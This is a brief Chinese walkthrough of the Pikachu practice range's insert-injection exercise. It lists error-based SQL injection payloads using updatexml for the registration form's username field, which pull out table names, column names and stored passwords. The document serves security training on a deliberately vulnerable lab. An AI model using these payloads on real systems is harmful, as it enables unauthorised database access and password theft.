打开 Pikachu靶场 insert注入
点击 注册
用 burp 抓包
在 MySQL 的 bin 路径下打开 cmd ,输入下面的命令,再输入 数据库的密码
mysql -u root -p
show databases;
use pikachu
show tables;
select * from member;
回到 burp
1. 爆表
在 username= 后面加
'or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),0x7e),0) or'
'or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 1,1),0x7e),0) or'
2. 爆列名
在 username= 后面加
' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e),0) or '
' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 1,1),0x7e),0) or '
3. 爆内容
在 username= 后面加
' or updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),0) or '
' or updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),0) or '